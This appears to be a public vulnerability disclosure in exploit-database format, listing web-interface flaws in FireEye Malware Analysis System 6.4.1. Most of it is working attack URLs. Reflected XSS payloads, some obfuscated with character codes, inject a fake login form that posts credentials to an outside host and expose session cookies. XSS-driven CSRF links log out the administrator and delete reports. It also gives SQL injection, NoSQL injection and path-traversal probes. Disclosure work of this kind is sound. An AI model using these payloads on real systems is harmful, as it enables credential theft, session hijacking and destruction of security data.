# Exploit Title: Fireeye Malware Analysis System multiple vulnerabilities
# Google Dork: none
# Date: 06/05/2014
# Exploit Author: kmkz (Bourbon Jean-Marie)
# Vendor Homepage: http://www.fireeye.com/fr/fr/
# Software Link: http://www.fireeye.com/products-and-solutions/
# Version: 6.4.1
# CVE : none

*************************************************************
*[Audit Type] web IHM ONLY / Full black-box audit 		    *
*												  		    *
*[Multiples Vulnerabilities] 					  		    *
* 												  		    *
*	3 XSS (reflected)							  		    *
*	1 CSRF										  		    *
*	1 NoSQLi (Json object)						  		    *
*	1 PostGreSQL SQLi (Exploitable?) 			  		    *
*	1 File and Path Disclosure					  		    *
*	1 Source code Info-leak								    *
* 												  		    *
*************************************************************



[*] XSS:
	+First XSS (reflected):
		https://192.168.1.50/yara/show_ya_file?name=<body onload=alert('XSSED')>
	PoC :
		Redirection:
			https://192.168.1.50/yara/show_ya_file?name=<body
onload=document.location=(String.fromCharCode(104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109))>
		Url encoded redirection payload:
			https://192.168.1.50/yara/show_ya_file?name=%3Cbody%20onload%3Ddocument.location%3D(String.fromCharCode(104%2C116%2C116%2C112%2C58%2C47%2C47%2C103%2C111%2C111%2C103%2C108%2C101%2C46%2C99%2C111%2C109))%3E%0A%09

		Phishing page PoC:
			https://192.168.1.50/yara/show_ya_file?name=<body
onload=document.write(String.fromCharCode(60,104,116,109,108,62,60,98,111,100,121,62,60,104,101,97,100,62,60,109,101,116,97,32,99,111,110,116,101,110,116,61,34,116,101,120,116,47,104,116,109,108,59,32,99,104,97,114,115,101,116,61,117,116,102,45,56,34,62,60,47,109,101,116,97,62,60,47,104,101,97,100,62,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,59,34,62,60,102,111,114,109,32,77,101,116,104,111,100,61,34,80,79,83,84,34,32,65,99,116,105,111,110,61,34,104,116,116,112,115,58,47,47,119,119,119,46,103,111,111,103,108,101,46,114,117,34,62,80,104,105,115,104,105,110,103,112,97,103,101,32,58,60,98,114,32,47,62,60,98,114,47,62,85,115,101,114,110,97,109,101,32,58,60,98,114,32,47,62,32,60,105,110,112,117,116,32,110,97,109,101,61,34,85,115,101,114,34,32,47,62,60,98,114,32,47,62,80,97,115,115,119,111,114,100,32,58,60,98,114,32,47,62,60,105,110,112,117,116,32,110,97,109,101,61,34,80,97,115,115,119,111,114,100,34,32,116,121,112,101,61,34,112,97,115,115,119,111,114,100,34,32,47,62,60,98,114,32,47,62,60,98,114,32,47,62,60,105,110,112,117,116,32,110,97,109,101,61,34,86,97,108,105,100,34,32,118,97,108,117,101,61,34,79,107,32,33,34,116,121,112,101,61,34,115,117,98,109,105,116,34,32,47,62,32,60,98,114,32,47,62,60,47,102,111,114,109,62,60,47,100,105,118,62,60,47,98,111,100,121,62,60,47,104,116,109,108,62))>
		Url encoded phishing page payload:
			https://192.168.1.50/yara/show_ya_file?name=%3Cbody%20onload%3Ddocument.write(String.fromCharCode(60%2C104%2C116%2C109%2C108%2C62%2C60%2C98%2C111%2C100%2C121%2C62%2C60%2C104%2C101%2C97%2C100%2C62%2C60%2C109%2C101%2C116%2C97%2C32%2C99%2C111%2C110%2C116%2C101%2C110%2C116%2C61%2C34%2C116%2C101%2C120%2C116%2C47%2C104%2C116%2C109%2C108%2C59%2C32%2C99%2C104%2C97%2C114%2C115%2C101%2C116%2C61%2C117%2C116%2C102%2C45%2C56%2C34%2C62%2C60%2C47%2C109%2C101%2C116%2C97%2C62%2C60%2C47%2C104%2C101%2C97%2C100%2C62%2C60%2C100%2C105%2C118%2C32%2C115%2C116%2C121%2C108%2C101%2C61%2C34%2C116%2C101%2C120%2C116%2C45%2C97%2C108%2C105%2C103%2C110%2C58%2C32%2C99%2C101%2C110%2C116%2C101%2C114%2C59%2C34%2C62%2C60%2C102%2C111%2C114%2C109%2C32%2C77%2C101%2C116%2C104%2C111%2C100%2C61%2C34%2C80%2C79%2C83%2C84%2C34%2C32%2C65%2C99%2C116%2C105%2C111%2C110%2C61%2C34%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C103%2C111%2C111%2C103%2C108%2C101%2C46%2C114%2C117%2C34%2C62%2C80%2C104%2C105%2C115%2C104%2C105%2C110%2C103%2C112%2C97%2C103%2C101%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C98%2C114%2C47%2C62%2C85%2C115%2C101%2C114%2C110%2C97%2C109%2C101%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C32%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C85%2C115%2C101%2C114%2C34%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C80%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C80%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C34%2C32%2C116%2C121%2C112%2C101%2C61%2C34%2C112%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C34%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C86%2C97%2C108%2C105%2C100%2C34%2C32%2C118%2C97%2C108%2C117%2C101%2C61%2C34%2C79%2C107%2C32%2C33%2C34%2C116%2C121%2C112%2C101%2C61%2C34%2C115%2C117%2C98%2C109%2C105%2C116%2C34%2C32%2C47%2C62%2C32%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C47%2C102%2C111%2C114%2C109%2C62%2C60%2C47%2C100%2C105%2C118%2C62%2C60%2C47%2C98%2C111%2C100%2C121%2C62%2C60%2C47%2C104%2C116%2C109%2C108%2C62))%3E
	+Second XSS (reflected):
		https://192.168.1.50/network/network?new_domain=%3Cscript%3Ealert%28%27XSSED%27%29%3C%2Fscript%3E
	+Third XSS (reflected):
		https://192.168.1.50/manual/csc?mode=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
Show Cookie PoC:
			https://192.168.1.50/manual/csc?mode=%3C/script%3E%3Ccenter%3E%3Cscript%3Edocument.write%28%22%22%29%3C/script%3E%3Cb%3EUser%20Informations:%3C/b%3E%3Cbr/%3E%3Cscript%3Edocument.write%28document.cookie%29%3C/script%3E%3C/center%3E%3Cpwn

[*] CSRF:

	PoC:
		admin logout:
			https://192.168.1.50/network/network?new_domain=<script>document.location="https://192.168.1.50/login/logout?notice=Deconnection+kmkz+CSRF+PoC"</script>
		Url encoded admin deconnexion PoC:
			https://192.168.1.50/network/network?new_domain=%3Cscript%3Edocument.location%3D%22https%3A%2F%2F192.168.1.50%2Flogin%2Flogout%3Fnotice%3DDeconnection%2Bkmkz%2BCSRF%2BPoC%22%3C%2Fscript%3E
		Report deleting:
			https://192.168.1.50/network/network?new_domain=<script>document.location="https://192.168.1.50/report/delete_pdf/?id=Alert_Details_fireye-2F_20140502_120000.xml"</script>
		Url encoded report deleting Poc:
			https://192.168.1.50/network/network?new_domain=%3Cscript%3Edocument.location%3D%22https%3A%2F%2F192.168.1.50%2Freport%2Fdelete_pdf%2F%3Fid%3DAlert_Details_fireye-2F_20140502_120000.xml%22%3C%2Fscript%3E
[*] SQLi  PostGreSQL (Exploitable?):
	https://192.168.1.50/event_stream/send_pcap_file?ev_id=9999 OR SELECT 1,2
FROM events /**

	output:
		Event ID '9999 OR SELECT 1,2 FROM events ' could not be retrieved.
Couldn't find Event with id=9999 OR SELECT 1,2 FROM events
	https://192.168.1.50/event_stream/send_pcap_file?ev_id=99999999999	 Output:
	    Event ID '99999999999' could not be retrieved.
	    PG::Error: ERROR: value "99999999999" is out of range for type
integer : SELECT "events".* FROM "events" WHERE "events"."id" = $1 LIMIT 1


[*] Files & Directory Disclosure:
	https://192.168.1.50/malware_analysis/ma_repo : the Input Path field
allow Path & file disclosure ../../../../../../../bin/sh (example)


{*] Others:
	1)No SQLi (Json)
https://192.168.1.50/network/network?new_domain[$ne]=blah
	Return: {"$ne"=>"blah"} is not a valid host // Exploitable?
	2)Source code Info-leak:
		https://192.168.1.50/manual/csc?mode=%3C/script%3E

-- 
kmkz
PGP: B24EAF34